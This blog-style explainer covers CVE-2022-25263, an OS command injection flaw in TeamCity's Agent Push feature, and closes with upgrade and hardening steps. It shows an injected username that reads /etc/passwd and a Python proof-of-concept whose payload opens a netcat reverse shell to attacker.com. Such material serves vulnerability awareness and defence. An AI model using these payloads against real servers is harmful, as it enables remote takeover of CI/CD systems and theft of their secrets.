CVE-2022-25263 - OS Command Injection in JetBrains TeamCity Agent Push Feature Explained

JetBrains TeamCity is a popular Continuous Integration (CI) and Continuous Delivery (CD) server that helps developers automate their build, test, and deployment pipelines. If you use TeamCity for your development workflows, it’s crucial to keep an eye on security updates. One notable vulnerability, CVE-2022-25263, affected versions of TeamCity released before 2021.2.3. In this post, let's break down what this vulnerability is, illustrate how it can be exploited (with code), and provide steps to protect your own TeamCity instance.

What is CVE-2022-25263?

CVE-2022-25263 is an OS command injection vulnerability. It means that in certain conditions, an attacker could trick TeamCity into running system commands on the server. This vulnerability specifically lives inside the Agent Push feature, which administrators use to push and configure new build agents.

To be precise, the Agent Push feature had a flaw in how it handled user-supplied fields (like configuration or connection parameters). If malicious input is provided, TeamCity would pass it directly to the operating system shell without properly checking or escaping it. This opened the door for attackers to execute arbitrary commands, which could quickly lead to compromise of the entire server.

How Does the Attack Work?

To exploit CVE-2022-25263, an attacker needs access to the TeamCity web interface with enough permissions to configure Agent Push (usually available to admins). When an admin configures (or reconfigures) agent deployment, some fields—such as "Username" or "Host"—were not safely sanitized. Commands injected here would run with the privileges of the TeamCity server process.

Visualizing the Attack

Suppose there’s a field for the Username in the Agent Push configuration. Instead of a normal username (like teamcity-agent), an attacker could enter something malicious, such as:

teamcity-agent; whoami; cat /etc/passwd

This input gets inserted into a system command something like

ssh teamcity-agent@host

But with the malicious input, it becomes

ssh teamcity-agent; whoami; cat /etc/passwd@host

Execute whoami (prints the current user)

- Execute cat /etc/passwd (prints the system’s user list)

Attack Example: Proof-of-Concept Code

Here is an example exploit written in Python, which simulates what an attacker would do if they had access to the web interface (assuming no server-side sanitization):

import requests

# Base URL of TeamCity Server
url = 'http://teamcity.local:8111';

# Authentication cookies or headers (fill in with your valid session)
auth_cookies = {
    "TCSESSIONID": "abcdef123456789"
}

# The payload injection - notice the semicolons to break into the shell
malicious_username = 'attacker; nc attacker.com 4444 -e /bin/sh; #'

post_data = {
    'username': malicious_username,
    'host': 'agenthost.local',
    'other_config': 'value'
}

# Attempt to push a new agent with the malicious username
response = requests.post(
    f"{url}/admin/admin.html?item=pushAgent",
    cookies=auth_cookies,
    data=post_data
)

print("Exploit sent, check your listener for shells")

> Note: Never run this code against systems you don't own or manage! This is for security awareness only.

With this exploit, attackers could

- Read sensitive files (cat /etc/passwd, /var/lib/teamcity/config/database.properties, etc.)

Use the compromised server as a pivot point into corporate networks

- Disrupt CI/CD operations by deleting build artifacts

This level of access is especially dangerous because TeamCity often runs with high privileges and access to build artifacts, secret environments, and sometimes deployment keys.

Want to verify or read more about this issue? Check these sources

- JetBrains Advisory: Security Updates in TeamCity 2021.2.3
- NVD Entry for CVE-2022-25263
- Exploit-DB Entry (if available):
- GitHub Search for PoC Code

How to Fix It

JetBrains fixed this issue in TeamCity 2021.2.3 and later. If you’re running an older version—it is time to upgrade now! Here’s what to do:

Upgrade TeamCity

Download the latest version and update your server.

Harden Permissions

Restrict who can access the Agent Push feature. Only trusted administrators should have this permission.

Monitor Server Logs

Watch for suspicious activity, such as unexpected agent deployments or unusual system command executions.

4. Network Segment Your CI/CD  
  Keep the TeamCity server on isolated networks, where only necessary developers or automation can access it.

Conclusion

CVE-2022-25263 in JetBrains TeamCity is a reminder of the risk posed by OS command injection vulnerabilities in tools at the heart of software development workflows. If you manage a CI/CD server, always apply updates promptly, restrict powerful features like agent push, and pay close attention to user input validation.

Stay safe. Patch your TeamCity. And always double-check what your servers are running.

---
*Do you want a deeper dive into the technical fix, or guidance for post-exploitation forensics? Leave a comment below!*

Timeline

Published on: 02/25/2022 20:15:00 UTC
Last modified on: 03/08/2022 17:31:00 UTC